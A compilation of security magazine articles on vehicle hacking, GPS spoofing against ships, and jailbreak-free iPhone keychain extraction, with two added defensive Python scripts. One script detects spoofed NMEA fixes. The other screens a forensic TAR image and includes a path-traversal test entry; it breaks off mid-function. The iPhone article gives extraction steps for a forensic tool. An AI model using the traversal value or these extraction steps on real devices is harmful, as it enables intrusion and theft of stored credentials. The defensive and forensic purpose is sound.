Shachar Daniel is the CEO at Safe-T and one of its cofounders. In his role, he is responsible for the overall vision, company strategy, day-to-day operations, and for growing Safe-T’s business and presence around the world. Shachar brings to Safe-T more than 14 years of experience in various managerial and business roles. Prior to founding Safe-T, he was program manager at Prime-sense, head of operations for project managers at Logic and project manager at Elbit Systems. He is an experienced manager with a passion and high commitment for project delivery. Shachar holds an Executive MBA from The Hebrew University, an MBA from The College of Management Academic Studies in Israel and a B.Sc. in Industrial Engineering from The Holon Institute of Technology.



Should We Be Worried About Vehicle Hacking?

And what can we do about it?

By Martin Banks

With more connected devices than ever, cybersecurity is a more prominent issue today than ever before. You'll see articles and discussions about security for computers, smartphones and wearables, but these may not cover everything. As more vehicles are including internet-based functions, should we be worried about vehicle hacking?

Ten years ago, this question would seem like nothing but science fiction. Now that we're on the cusp of the driverless vehicle revolution, though, it may require some attention. Here's a closer look at connected cars and whether they present a cybersecurity risk.

The Rise of the Connected Car

To understand the gravity that vehicle hacking may present, you first have to know how prevalent connected vehicles are. When you look at the data, you realize these technologies may be more widespread than you thought. There were more than 50 million shipments of connected cars in 2019, up 45% from the year prior.



With an adoption rate like that, it won't be long before connected cars cover the roads. Not everyone needs to drive an internet-enabled vehicle for them to impact everyone, either. Any hacked automobile endangers nearby drivers and passengers, so even with a low penetration rate, they could be risky.

Cars aren't the only connected vehicles out there, either. Other modes of transportation, like ships, are also becoming increasingly connected.

How Are Vehicles Vulnerable?

It's evident, then, that there are enough connected vehicles for hacking to be a concern. The number of potential targets isn't the only factor at play, though. You also have to consider what makes these cars targets in the first place.

The answer to this one is relatively straightforward. Almost anything with an internet connection can be attacked, especially if the connection is active. Internet-based functions in cars, like online radio, are active in that they send and receive commands, which makes them reachable by an attacker.

Some vehicles use Internet of Things (IoT) devices to do things like track engine performance or measure fuel efficiency. These sensors provide hackers with another point of entry if they don't include proper security features.

Is There a Precedent for Vehicle Hacking?

So has anyone hacked into a vehicle before? Yes, and vehicle hacking incidents may be more frequent than you'd think. According to the cybersecurity firm Upstream, there were roughly 150 car hacking incidents in 2019.

Considering how many connected cars there are, that figure isn't that massive. You should also consider that this number also includes hacks on automotive companies, not just cars themselves. Still, it represents a 99% increase over 2018's hacking incidents, which is a troubling trend.

While these real-world instances may not have been too harmful, tests show that they could be. In 2015, hackers remotely cut the power of a Jeep as it was driving in a demonstration for Wired. If this were to happen outside of a safety showcase, it could have disastrous results.

Responses from Manufacturers

Some good news is that vehicle manufacturers are aware of these potential risks. After the 2015 Wired hacking demonstration, Fiat Chrysler sent 1.4 million car owners flash drives containing software patches. Similarly, Tesla updated all Model Xs after researchers hacked into one and activated its brakes.

Both of these instances involve manufacturers responding to an issue they initially missed. Had malicious actors exploited these problems before white-hat hackers did, the consequences could have been much more severe. Still, with these cases attracting media attention, more manufacturers will take cybersecurity seriously during production.

As vehicles become more teched-out, more tech experts are involved in the design and production process. With the presence of these voices, manufacturers could take a greater interest in cybersecurity.

Defending Against Vehicle Hacking

Drivers of connected cars aren't helpless concerning cybersecurity. Built-in cybersecurity systems are a necessary step in vehicle production, but drivers can protect themselves in other ways. The rising concerns over vehicle cybersecurity have led to the emergence of companies selling third-party security solutions for cars.

Operators using IoT devices in their vehicles should ask the device providers about security features. Experts also recommend that they require transparency and high standards from any company that receives data from these sensors. Fleets shouldn't work with any business that doesn't showcase appropriate data governance.

If more owners and drivers speak up about security issues, manufacturers will likely respond to the market pressure. As the public shows interest in security, the producers will offer it.

Security Expert Recommendations

To recap everything we've established so far: hacking vehicles is possible and has some precedent, and manufacturers are addressing the issue. Additionally, drivers can protect themselves as a supplementary layer of security. The last step in deciding whether this is a cause for worry is looking to the experts. So what do they think?

Cybersecurity authorities have become increasingly concerned with vehicle hacking in the past few years. Late last year, the Federal Bureau of Investigation (FBI) warned of growing cyberthreats in the automotive industry. The Bureau cited the increase of data coming from vehicles as a reason why hackers may target cars.

In response to these threats, the FBI suggested auto companies take cybersecurity more seriously. Notice they didn't say to abandon the concept of a connected car altogether. Manufacturers should just keep security at the forefront.

Vehicle Cybersecurity Today and Tomorrow

With all these factors in mind, should we be worried about vehicle hacking? There may not be a cause for worry, but there is certainly reason for increased concern. This issue is a minor one right now, but it's also growing. It requires adequate attention, but not panic.

Vehicle hacking isn't a widespread problem today, but it could become one in the future. Manufacturers should start investing in more thorough security solutions as they add more internet-enabled functions to their automobiles. By addressing these issues today, we can stop a crisis tomorrow.

The Age of IoT Brings New Challenges

Technological revolutions always come with some growing pains. As the IoT becomes more prevalent, cybersecurity likewise turns into a more pressing concern. That doesn't mean we should avoid the era of connectivity, but that we should take care to secure it.

You shouldn't worry about vehicle hacking, but you should take it seriously. With a widespread effort to combat security issues before they appear, the future of connected vehicles will come sooner.

About the Author

Martin Banks is the founder and Editor-in-Chief of Modded. You can find his writing all over the internet. He covers tech, gear, cars, and more.



Cyber Attacks at Sea: Blinding Warships.

Is GPS completely vulnerable to cyberattacks?

By Julien Chesaux, Cyber Security Consultant, Kudelski Security

Who Controls the Sea, Controls the World

The annual multilateral exercise between the U.S. and Thai armies, named “Cobra Gold” [1], sees the deployment of the latest navy warships as a proof of military domination in a contested region and reminds us of the fragility of technologies at sea, as a chain of incidents demonstrated in 2017.

The world’s oceans can be beautiful and awe-inspiring, but also very dangerous. Most importantly, they are strategic for the global economy and, consequently, countries compete to control them. Statistics reveal the high value of the high seas: 70% of the globe is covered by water and over 90% of the world’s trade is carried by sea. Moreover, the global merchant fleet totals 50,000 ships that move 9 billion tons of merchandise annually, representing a turnover of $2,000 billion [2].

Human history is punctuated with many regional or global exchanges that happened through decisive battles at sea. The battle of Salamis saw the Athenians saving the concept of democracy against the Persians. The battle of Actium allowed the Roman Republic to become an Empire. The battle of Trafalgar destroyed Napoleon’s aspiration to invade Britain.

At the beginning of the 20th century, in 1905, the battle of Tsushima humiliated the Russian Empire and opened the pathway for an Imperial Japan. During WWI, the battle of Jutland contained the Imperial German Navy, and WWII witnessed the battle of Midway that established the U.S. as the new naval superpower after the destruction of Japan’s aircraft carrier fleet in the Pacific. More recently, the Crimea annexation by Russia was, even if triggered by different causes, a geopolitical move to avoid the loss of access to the Mediterranean Sea.

[1] WILLIAMS Zachary. “Cobra Gold 2020: America’s Strategic Shift in Southeast Asia”, The Diplomat, Mar 6, 2020, https://thediplomat.com/2020/03/cobra-gold-2020-americas-strategic-shift-in-southeast-asia/

[2] Sea Europe. “2017 Market Forecast Report”, Sea Europe, 2016, https://maritimetechnology.nl/media/2017-Market-Forecast-Report-finaal.pdf

The current hawkish posture and the “gunboat diplomacy” followed by China are not a surprise given its ambitions to play a greater global leadership role, to protect its shores where most of its economic activity occurs (its “strategic belt”), and to defend its natural resources and the sea lines that supply them, from the South and East China Seas (represented by the Nine-Dash Line) to the Indian Ocean (currently projected as the “String of Pearls” [3]).

A Global Rivalry with Multiple Bottlenecks

Because globalization increases global trade, sea roads are busy and multiple bottlenecks are under the spotlight, including many straits and canals. For instance, the Strait of Malacca represents 40% of global trade and 50% of energy trade, and is indispensable for regional hegemons like China and Japan.

Another geostrategic path is the Strait of Hormuz, between Oman and Iran, through which all the Gulf oil trade moves. In this region, the U.S. Navy is face-to-face with the Iranian one. The USS Harry S. Truman aircraft carrier is presently deployed in the Arabian Sea (near Oman) as part of the U.S. 5th Fleet, which covers the Middle East, a crucial region for the U.S. as 18% of its imported oil comes from the Persian Gulf countries [4]. In 1967, the blockade of the Strait of Tiran by Egypt was used as casus belli by Israel and started the Six-Day War. Indeed, the Strait is the only way to leave the Gulf of Aqaba and gain access to Iran’s oil. Other important passages such as the Bab El-Mandab Strait, the Danish Straits, or the Bosporus are well-known narrow gullies.

Canals are equally critical for international trade, especially the Suez and the Panama ones. The former was the theater of a war in 1956 between Egypt and a French, British and Israeli alliance (encompassed in the secretive Protocol of Sèvres) to regain control after it was nationalized by the infamous Egyptian President Nasser. The latter, under U.S. control for almost 100 years, was retroceded to Panama and recently enlarged to accommodate the new bigger ships and ensure revenue to Panama, as it represents 5.5% of its GDP.

The Art of Hacking Navigation Systems

In 2017, some incidents at sea sparked questions as hundreds of South Korean fishing vessels returned early to port after their GPS (Global Positioning System) signals were jammed, allegedly by North Korean hackers [5]. Later that year, a ship in the Black Sea reported to the U.S. Coast Guard Navigation Center that its GPS system had been disrupted and that over 20 ships in the same area had been similarly affected [6]. In Asian waters, deadly collisions happened twice in two months: in June 2017, the USS Fitzgerald was struck by a container ship off the coast of Japan, killing 7 sailors. Later during the year, an oil tanker smashed into the USS John S. McCain near the Malaysian coast and 10 sailors died [7]. There were also two other lesser-known incidents in 2017: in January, the USS Antietam ran aground near its base in Japan and in May the USS Lake Champlain collided with a South Korean fishing vessel [8]. Consequently, Vice Admiral Joseph Aucoin was relieved of his duty as commander of the U.S. 7th Fleet, the largest forward-deployed U.S. fleet, based in Japan and covering Asia [9].

[3] HUGHES Lindsay. “String of Pearls Redux: Increased Concern for India”, Future Directions International, Nov 13, 2018, http://www.futuredirections.org.au/publication/string-of-pearls-redux-increased-concern-for-india/

[4] U.S. Energy Information Administration (EIA). “How much petroleum does the United States import and export?”, EIA, Apr 4, 2017, https://www.eia.gov/tools/faqs/faq.php?id=727&t=6

The causes of all these incidents are not clear. Some experts blame the weather, the heavy reliance on technology, the weak GPS signal, cyberattacks, the reduction in crew numbers or the high pace of deployment, which leaves little time for training and maintenance. Given the number of incidents in a less-than-one-year period and the highly disputed regions where they happened (South East Asia and East Asia), the theory of deliberate interference with navigation systems through cyberattacks is legitimate, especially when the navigation system used is analyzed.

Ships orient themselves through Global Navigation Satellite Systems (GNSS), with many countries using their own: GPS for the U.S., GLONASS for Russia, GALILEO for the E.U., QZSS for Japan, BeiDou for China, and NAVIC for India. Although precise to a few meters, this technology is not highly secure because the signal is weak and can be jammed or spoofed. The same year as these incidents, a security researcher based in France was able to enter the satellite communications system of a ship: through Shodan, a search engine that reveals internet-connected devices, and by entering a simple username (admin) and password (1234), he accessed the communication center of a commercial ship and posted his feat on Twitter: “I’m connected to a mother****ing ship as admin right now. Hacking ships is easy” [10].
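A GNSS receiver hands its fixes to the rest of the bridge as NMEA 0183 sentences, and the weak-signal problem described above is what makes a jammed or spoofed fix possible. The Python below is an added example, not code from the article or from Kudelski Security, showing the kind of plausibility check a bridge system or a fleet security team could run over that feed: it verifies each sentence's checksum and rejects corrupt ones, then computes the speed implied by consecutive fixes and flags any fix the hull could not physically have reached, which is the simplest signature of a spoofed position. The sample log, the Singapore-area coordinates and the speed thresholds are constructed for this example.

```python
import math
from functools import reduce

MAX_SHIP_SPEED_KN = 60.0   # assumption: no merchant or naval hull plausibly exceeds this
SPEED_DISAGREE_KN = 20.0   # assumption: tolerated gap between reported and implied speed
EARTH_RADIUS_NM = 3440.065


def nmea_checksum(body: str) -> int:
    """XOR of every byte between '$' and '*', as NMEA 0183 defines it."""
    return reduce(lambda acc, ch: acc ^ ord(ch), body, 0)


def make_sentence(body: str) -> str:
    """Frame a sentence body with '$' and its two-hex-digit checksum."""
    return "$%s*%02X" % (body, nmea_checksum(body))


def _coord(value: str, hemisphere: str, deg_digits: int) -> float:
    """Convert NMEA 'ddmm.mmmm' / 'dddmm.mmmm' into signed decimal degrees."""
    degrees = int(value[:deg_digits]) + float(value[deg_digits:]) / 60.0
    return -degrees if hemisphere in ("S", "W") else degrees


def parse_rmc(sentence: str):
    """Validate framing and checksum of a $..RMC sentence; return a fix dict or None."""
    if not sentence.startswith("$") or "*" not in sentence:
        return None
    body, _, checksum = sentence[1:].partition("*")
    try:
        if int(checksum, 16) != nmea_checksum(body):
            return None
    except ValueError:
        return None
    f = body.split(",")
    if len(f) < 10 or not f[0].endswith("RMC") or f[2] != "A":  # 'A' = receiver says fix is valid
        return None
    hh, mm, ss = int(f[1][0:2]), int(f[1][2:4]), float(f[1][4:])
    return {
        "t": hh * 3600 + mm * 60 + ss,          # seconds since midnight UTC
        "lat": _coord(f[3], f[4], 2),
        "lon": _coord(f[5], f[6], 3),
        "sog_kn": float(f[7]),                  # speed over ground the receiver reports
    }


def haversine_nm(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance in nautical miles."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_NM * math.asin(math.sqrt(a))


def assess_track(sentences):
    """Return (index, reason) for every sentence that fails integrity or plausibility."""
    findings, previous = [], None
    for i, sentence in enumerate(sentences):
        fix = parse_rmc(sentence)
        if fix is None:
            findings.append((i, "checksum or framing invalid, sentence rejected"))
            continue
        if previous is not None and fix["t"] > previous["t"]:
            hours = (fix["t"] - previous["t"]) / 3600.0
            implied = haversine_nm(previous["lat"], previous["lon"], fix["lat"], fix["lon"]) / hours
            if implied > MAX_SHIP_SPEED_KN:
                findings.append((i, f"implied speed {implied:.0f} kn exceeds {MAX_SHIP_SPEED_KN:.0f} kn"))
            elif abs(implied - fix["sog_kn"]) > SPEED_DISAGREE_KN:
                findings.append((i, f"implied speed {implied:.1f} kn disagrees with reported {fix['sog_kn']:.1f} kn"))
        previous = fix
    return findings


# Constructed receiver log (assumption): a ship making 12 kn northbound near
# Singapore, then a fix that moves it 28 nautical miles in ten seconds, then a
# sentence whose body was altered after its checksum was computed.
_BODIES = [
    "GPRMC,081810.00,A,0102.0000,N,10345.0000,E,12.0,000.0,190620,,,A",
    "GPRMC,081820.00,A,0102.0335,N,10345.0000,E,12.0,000.0,190620,,,A",
    "GPRMC,081830.00,A,0130.0000,N,10345.0000,E,12.0,000.0,190620,,,A",
]
SAMPLE_LOG = [make_sentence(b) for b in _BODIES]
SAMPLE_LOG.append(make_sentence(_BODIES[0]).replace("12.0", "99.0"))

if __name__ == "__main__":
    for index, reason in assess_track(SAMPLE_LOG):
        print(f"sentence {index}: {reason}")
```

A checksum only catches corruption, not a well-formed spoofed sentence, which is why the second check compares each fix against the vessel's own motion; a production system would add a third reference that the article's eLoran discussion points to, cross-checking GNSS against an independent source such as terrestrial radio, inertial navigation or the dead-reckoned position from log and gyro.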

New Alternatives

To prevent this over-dependency on GNSS for Positioning, Navigation and Timing (PNT), some states are developing alternatives that rely on terrestrial radio frequency, an old technology used since WWII. One of these systems is called eLoran (Enhanced LOng-RAnge Navigation) and although it is less accurate, regional, and only two-dimensional, it offers a powerful signal that deters jamming or spoofing [11]. Cost and political inertia thwarted this technology, but this is likely to change given these events. South Korea is currently testing this technology and Russia is developing its own eLoran, named eChayka [12]. In the U.S., the Director of National Intelligence told a Senate committee that the global threat of electronic warfare attacks against space systems would rise in coming years, and the U.S. Navy launched a Hack-Our-Ship event to assess cyber threats at sea, such as hacking a complex software system simulating the ones used to control U.S. Navy fleets [13, 14].

[5] SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

[6] Ibid.

[7] FIFIELD Anna. “Bodies of all 10 sailors missing on USS John S. McCain have been recovered”, The Washington Post, Aug 27, 2017, https://www.washingtonpost.com/world/bodies-of-all-10-sailors-missing-on-uss-john-s-mccain-have-been-recovered/2017/08/27/a2af6c4a-8b8c-11e7-a2b0-e68cbf0b1f19_story.html

[8] BARANIUK Chris. “Why it’s not surprising that ship collisions still happen”, BBC, Aug 22, 2017, http://www.bbc.com/future/story/20170822-why-its-not-surprising-that-ship-collisions-still-happen

[9] AFP. “U.S. Warship Collisions Raise Cyberattack Fears”, Security Week, Aug 23, 2017, http://www.securityweek.com/us-warship-collisions-raise-cyberattack-fears

[10] CHAMBERS Sam. “Ship’s satellite communication system hacked with ease”, Splash 24/7, Jul 19, 2017, http://splash247.com/ships-satellite-communication-system-hacked-ease/

Military and Economic Implications

In network-centric warfare, the military relies on information gathering to Observe, Orient, Decide, Act (the OODA loop), and GNSS are part of the tools used to collect it. On the battlefield, it is the capacity to make the right decision as quickly as possible, and most specifically quicker than your enemy, that makes the difference between victory/life or defeat/death. Therefore, an army relying too much on one technology could be “blinded” during a conflict and unable to allocate forces efficiently.

Following 19th Century American Navy Strategist Alfred T. Mahan, the U.S. developed a great power projection capability after WWII that enables it to rapidly deploy military means to defend any interest, whether political, economic, military or humanitarian. Power projection is a mix of hard and soft power, depending on the situation. This approach is materialized by aircraft carriers and the separation of fleets allocated to specific regions of the globe (7 for the U.S. Navy).

Aircraft carriers do not travel the sea alone: an entire structure of ships and submarines escorts them, known as a carrier strike group (CSG), with a total crew of more than 7,500 [15]. The total acquisition cost of a CSG exceeds $25 billion, an air wing (the aircraft on the carrier) another $10 billion, and estimated annual operating costs are around $1 billion [16]. Currently, the U.S. has 10 Nimitz-class nuclear-powered supercarriers. Therefore, a major cyberattack on navigation systems, for example, could paralyze an entire CSG and considerably diminish the U.S. ability to maneuver.

On the economic side, the world’s largest container ship and supply vessel company, Moller-Maersk, suffered from the wiper malware attack named NotPetya, and the company reported a loss between USD 200-300 million for Q3 2017 [17]. More specifically, navigation systems such as the Electronic Chart Display and Information System (ECDIS) are very vulnerable and have also been hit, with different attacks being reported in Asia. According to the maritime technical lead at cyber security firm NCC Group, "Ecdis systems pretty much never have anti-virus" [18].

[11] SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

[12] DUNN John E. “Cyberattacks on GPS leave ships sailing in dangerous waters”, Naked Security, Aug 7, 2017, https://nakedsecurity.sophos.com/2017/08/07/cyberattacks-on-gps-leave-ships-sailing-in-dangerous-waters/

[13] SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT

[14] OWENS Katherine. “Navy conducts ‘Hack-Our-Ship’ cybersecurity event”, Defense Systems, Mar 13, 2017, https://defensesystems.com/articles/2017/03/13/hacknavy.aspx

[15] WISE David W. “The U.S. Navy’s Big Mistake – Building Tons of Supercarriers”, War Is Boring, Dec 25, 2016, https://warisboring.com/the-u-s-navys-big-mistake-building-tons-of-supercarriers/

[16] Ibid.

Pyongyang Hackers are Smart

Both of the military vessels involved in collisions, the USS Fitzgerald and the USS John S. McCain, are guided missile destroyers equipped with the Aegis Ballistic Missile Defense System (BMDS), a system allowing the interception of an ICBM (Intercontinental Ballistic Missile), the kind currently being tested by North Korea and usually equipped with one or multiple nuclear warheads. An ICBM has four phases: boost, post-boost/ascent, midcourse and terminal (reentry into the atmosphere). The Aegis BMDS aims at destroying an ICBM during the post-boost/ascent phase (before the missile leaves earth’s atmosphere).

The Lazarus hacking group, famous for the Sony breach in 2014 and allegedly linked to North Korea, targets individuals associated with U.S. defense contractors with the same tools and tactics as the Sony breach. This time, the phishing emails display fake job listings and companies’ internal policies [19]. Some jobs listed were for the US THAAD (Terminal High Altitude Area Defense) system, which is a BMDS that intercepts an ICBM in its terminal phase (after the missile re-enters the atmosphere).

Therefore, if the four U.S. Navy collisions in Asian waters are due to a cyberattack, the explanation could be that the North Korean government is attempting to infiltrate the U.S. military system to collect information on the full spectrum of BMDS and, at best, disrupt the defense systems against its ICBMs. On the diplomatic side, it could be a strong message sent to the US and its Asian allies assuring them that Pyongyang has serious capabilities and that it would be better to negotiate with it than escalate tensions.

This strategy is part of a general trend in APT (Advanced Persistent Threat) activity: long-term, targeted cyberattacks mixing social engineering, cyberweapons, and vectors to get inside networks. Instead of hacking directly the big fish such as the Department of Defense or a big player in weapons (Aegis, Boeing, Lockheed Martin, etc.), hackers will target a third party working for these targets. Indeed, its cybersecurity posture will be lower than that of a critical administration or company with cyberdefense technologies and processes in place and employees aware of phishing campaigns.

[17] MIMOSO Michael. “MAERSK Shipping Reports $300M Loss Stemming from NotPetya Attack”, Threatpost, Aug 16, 2017, https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/

[18] BARANIUK Chris. “How hackers are targeting the shipping industry”, BBC, Aug 18, 2017, http://www.bbc.com/news/technology-40685821

[19] BARTH Bradley. “Lazarus Group tied to new phishing campaign targeting defense industry workers”, SC Media, Aug 14, 2017, https://www.scmagazine.com/lazarus-group-tied-to-new-phishing-campaign-targeting-defense-industry-workers/article/681701/


Future Tensions at Sea

Among many strategic hotspots, the most sensitive ones are currently the Indian Ocean, the South and

East China Seas, and, for the foreseeable future, the Artic.

The Indian Ocean is now a space of geopolitical criticality from a maritime perspective, especially now

that the U.S. wants to improve its relations with New Delhi to counterbalance Beijing’s aspirations in the

context of the BRI (Belt and Road Initiative). China is determined to change the status quo in this region

and is investing in ports (i.e. the String of Pearls) to control the flow of merchandise along sea lines from

China to the Middle East and Africa.

Indeed, these sea lines through the Indian Ocean are vital for China’s oil imports, as about 40% comes

through the Strait of Hormuz and over 80% through the Malacca Strait.20 Thus, the rationale of shifting

from a land-based armed force to a sea-based one is to defend these interests at sea and protect China

as a regional hegemon. Hence, the people’s liberation army is building aircraft carriers, submarines,

patrol vessels, and has put in place an A2/AD (Anti Access/Area Denial) tactic with investments on shorebased

anti-ship missiles. Ultimately, China wants to push the U.S. behind its second island chains (at the

east side of the Philippine Sea).

As pointed out by The Economist, the Asia Pacific is the trade region of the future: Eight out of the world’s

ten busiest container ports are there. Two-thirds of the world’s oil shipments travel across the Indian

Ocean. Almost 30% of maritime trade goes across the South China Sea; it accounts for over 10% of

world fisheries production and is thought to have oil and natural-gas deposits beneath its seabed.21

Another strategic hotspot will emerge northward: the Arctic. Within decades, the ice melting phenomenon

will open shipping lanes, allowing vessels like Russia’s first ice class LNG (Liquefied Natural Gas) tanker

to travel through the region. It will also increase disputes for the access to resources and to preserve its

fragile ecosystem.22

As in Rudyard Kipling’s novel “Kim”, which popularized the Great Game played between the British and Russian empires for control of Central Asia in the 19th century, the new great game is now between the US and China for control of all Asia. This rivalry will turn on the use and leverage of sea power, as naval strategist Alfred T. Mahan put in perspective in “The Influence of Sea Power Upon History”: national prosperity and power depend on control of the world’s sea lanes, thus “Whoever rules the waves rules the world”.[23]

[20] The Economist, “Who rules the waves?”, The Economist, Oct 17, 2015, https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules

[21] The Economist, “Who rules the waves?”, The Economist, Oct 17, 2015, https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules

[22] Author interviews, “Stavridis’ Book ‘Sea Power’ Explains Why Oceans Matter in Global Politics”, NPR, Jun 6, 2017, http://www.npr.org/2017/06/06/531701056/stavridis-book-sea-power-explains-why-oceans-matter-in-global-politics

[23] Mahan, Alfred Thayer, “The Influence of Sea Power upon History: 1660-1783”, Little, Brown and Company, Boston, 1890



About the Author

Julien Chesaux is a Cyber Security Consultant at Kudelski Security, a Swiss and American cyber security company. Julien mainly works on cyber security, information security and geopolitical analysis in order to help clients find solutions to their threats. He is also a speaker and writer for different think tanks, journals and events. He has worked in diplomacy and cyber security for 10 years in Switzerland, Australia, the Balkans and France. His main research interests are Global Security, Cyber Geopolitics and International Affairs.

LinkedIn profile: www.linkedin.com/in/julien-chesaux-65279456

You can reach me at julien.chesaux@gmail.com



iPhone Extraction Without a Jailbreak

Imaging the file system and decrypting the keychain from iOS devices without jailbreaking

By Oleg Afonin, Security Researcher, ElcomSoft Co. Ltd.

Traditionally, forensic experts without access to proprietary technologies have relied on jailbreaks to perform the lowest-level extraction of Apple iOS devices. Using jailbreaks, even advanced ones that exploit hardware vulnerabilities, presents a number of challenges. In this article, we offer an alternative method for accessing the content of iOS devices that does not require jailbreaking.

Jailbreak-based acquisition

Before covering jailbreak-free extraction, let’s talk about jailbreaks.

Why is a jailbreak needed during file system extraction? Jailbreaking the device allows experts to raise privileges to the level required to access the protected file system, which is simply not possible on Apple devices without superuser access. In addition, a jailbreak was the only way to extract and decrypt the complete content of the keychain, which holds all of the user’s saved passwords as well as certificates, identities and encryption keys (e.g. keys to the encrypted databases of third-party password managers). In other words, a jailbreak was (and still is) used to obtain the level of privileges required to access application sandboxes, stored passwords and encryption keys.



Why not just keep using a jailbreak?

If jailbreaks are such a great thing, why not keep using them for low-level extractions? The thing is, jailbreaks bring their share of problems. First and most importantly, public jailbreaks were never meant for mobile forensics. Installing a jailbreak unnecessarily modifies the system partition (making the post-acquisition future of the device uncertain). Since public jailbreaks are designed to allow running unsigned code (such as the various apps downloaded from third-party app stores), they make far more (and far deeper) modifications to the system than would be necessary for the purpose of forensic acquisition.

Finding the right jailbreak and installing it properly may also become a challenge if you are not accustomed to this sort of thing. For these and other reasons, jailbreaking may not be an option for some experts. This is where jailbreak-free acquisition comes in.

How jailbreak-free acquisition works

In the previous section, I wrote that one needs low-level access to the file system in order to perform the extraction, and this still holds even if you are not going to use a jailbreak. We developed a different method for obtaining the required level of privileges on a wide range of iOS devices. Explaining the essence of the method brings us back to jailbreaking.

Essentially, a jailbreak exploits several vulnerabilities discovered in a given version of iOS or a range of iOS versions. The vulnerabilities are exploited consecutively, one after another, which makes it a chain of exploits. A jailbreak requires a number of different exploits to escape the sandbox, obtain superuser access and disable the various protections iOS has in place to prevent this sort of thing. Finally, a jailbreak opens read/write access to the system partition and patches several files in order to disable signature verification, which allows installing apps from third-party app stores without Apple’s approval. While this is a grand oversimplification, you get the idea: a jailbreak does a lot of things that aren’t necessary for just extracting the file system and obtaining the keychain.

A given jailbreak can be installed on a given version of iOS (or a range of iOS versions). Different jailbreaks are required to break into different versions of the system, since different exploits are required. Our method automatically detects the installed version of iOS and applies exactly those exploits that are minimally required to obtain access to the file system. To do that, one must sign and install the ‘agent’ app on the device, and then use that agent to extract the file system and decrypt the keychain. Unlike jailbreaks, the agent performs all modifications in the device’s volatile memory (RAM) without writing anything unnecessary to persistent storage. The agent does not even touch the system partition, leaving the post-acquisition device perfectly usable and updatable.

Why choose jailbreak-free extraction over jailbreaks

There are numerous advantages of agent-based extraction over jailbreaks.

1. Jailbreak-free extraction is safe. The agent does not touch the system partition, leaving the device in a clean state after the acquisition.



2. Clean and forensically sound. The agent does not write anything unnecessary onto the data partition, and does not leave any traces behind apart from a few records in the system log.

3. Much easier to handle. Most jailbreaks (except checkra1n, which uses a hardware exploit) are limited to a narrow range of iOS versions. The agent carries all the exploits required to gain access to the data, and automatically applies the right exploit for a given version of iOS.

4. Robust operation. Jailbreaks are wonky to install, (very) frequently failing without an obvious reason and with no path forward. We have yet to see a single case where the agent would fail on a supported platform.

5. Offline operation. The agent can and should be installed with the device in Airplane mode. An Internet connection on the iPhone is never required, making it a safe, risk-free extraction.

Agent-based extraction also has two major drawbacks.

1. You will absolutely need a Developer account with Apple to sign and install the agent. A Developer account with Apple costs money (around $100/year if you use a personal one).

2. The agent is available for a wide but still limited range of iOS versions, currently supporting iOS 10.0 through iOS 13.4.1 inclusive. Extracting an iPhone running a newer iOS build would only be possible if we discover the corresponding exploit. Alternatively, the checkra1n jailbreak may be available if the device is an iPhone 8, 8 Plus or iPhone X or older.

How to use jailbreak-free extraction

Jailbreak-free extraction is available through Elcomsoft iOS Forensic Toolkit. You will also need an Apple ID enrolled in Apple’s Developer Program, with an app-specific password created in your profile. Write down that password; you’ll need it to sign the extraction agent. The acquisition steps are:

1. Connect the iPhone to your computer. Approve the pairing request (you may have to enter the passcode on the device to do that).

2. Launch Elcomsoft iOS Forensic Toolkit. The main menu will appear.

3. We strongly recommend performing logical acquisition first (by creating the backup, extracting media files etc.).

4. For agent-based extraction, you’ll be using numeric commands.

5. Press 1 to install the agent onto the iPhone. Enter the Apple ID and the app-specific password you’ve created in the developer profile, then type the ‘Team ID’ related to your developer account.

6. The agent is installed on the device. Tap the Agent icon on the iPhone to launch it, and keep it in the foreground during the extraction.

7. Press 2 to extract and decrypt the keychain (you can view it in Elcomsoft Phone Viewer).

8. Press 3 to capture the file system image. The tool uses the TAR format to save the file system image. You can view it with Elcomsoft Phone Viewer or third-party forensic tools.

9. Press 4 to clean up and uninstall the agent from the iPhone.
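The TAR image produced in step 8 is what the rest of the analysis rests on, so a practitioner will want to fix its hash for the case record and screen its entries before extracting anything to disk. The script below is an added illustration and is not ElcomSoft’s code or part of the toolkit; the image it processes is constructed in memory from made-up paths (one of them deliberately pointing outside the extraction folder) so that it runs offline.

```python
# Added example (not ElcomSoft's code): hash manifest and safety screening for a TAR
# file-system image like the one the toolkit writes in step 8. The image is constructed
# in memory from made-up paths so the script runs offline.
import hashlib
import io
import tarfile
from typing import Dict, List, Tuple

# Constructed sample entries standing in for an acquired image (not real device content).
# The last one deliberately points outside the extraction directory.
CONSTRUCTED_ENTRIES = [
    ("private/var/mobile/Library/SMS/sms.db", b"constructed sqlite payload"),
    ("private/var/mobile/Containers/Data/Application/APP-1/Documents/notes.txt", b"hello"),
    ("private/var/log/system.log", b"constructed log line: agent installed\n"),
    ("../outside/evil.txt", b"must never be written outside the case folder"),
]


def build_constructed_image() -> bytes:
    """Build the in-memory TAR image used by this demo."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in CONSTRUCTED_ENTRIES:
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def image_digest(image: bytes) -> str:
    """SHA-256 of the whole image: the value to record in the case notes at acquisition time."""
    return hashlib.sha256(image).hexdigest()


def is_unsafe_member(member: tarfile.TarInfo) -> bool:
    """True for entries that would land outside the extraction directory: absolute paths,
    '..' components, or symbolic/hard links whose target escapes."""
    def escapes(path: str) -> bool:
        parts = path.replace("\\", "/").split("/")
        return path.startswith("/") or ".." in parts

    if escapes(member.name):
        return True
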